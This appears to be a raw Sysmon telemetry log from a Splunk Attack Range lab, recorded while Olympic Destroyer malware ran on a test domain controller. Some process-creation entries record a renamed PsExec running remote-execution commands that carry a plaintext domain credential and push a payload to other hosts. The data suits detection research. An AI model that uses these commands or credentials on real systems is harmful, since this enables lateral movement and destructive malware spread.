10:57:06.566{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.566{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.566{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.498{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.482{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.494{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.482{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1302-6216-0A06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.482{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.482{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.482{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:06.467{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000292404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.435{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E15E9B19604CD5E0799844622D22A52,SHA256=CF339D14D56BEC616818153621DC42407BB6D0DD401984CB178E5F715D3120B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.435{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0906-000000003802}6780C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.435{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0906-000000003802}6780C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.420{C8EA50B7-1302-6216-0906-000000003802}67806676C:\Windows\system32\conhost.exe{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.398{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1302-6216-0906-000000003802}6780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.398{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1302-6216-0906-000000003802}6780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.382{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.382{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.382{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.382{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.282{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.282{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.289{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.282{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1302-6216-0806-000000003802}6560C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.267{C8EA50B7-1302-6216-0606-000000003802}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.251{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1302-6216-0606-000000003802}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.251{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1302-6216-0606-000000003802}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:06.251{C8EA50B7-1302-6216-0606-000000003802}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000217761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:06.103{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DBDFFDA3870F5810FC8DF7A5B189174,SHA256=ADA3176276E5AA1F8A63FBE7CAA31785EE8B47FEAFE44838287991C0B13185B2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.220{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0706-000000003802}6848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.219{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0706-000000003802}6848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.198{C8EA50B7-1302-6216-0706-000000003802}6848884C:\Windows\system32\conhost.exe{C8EA50B7-1302-6216-0606-000000003802}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.183{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1302-6216-0706-000000003802}6848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 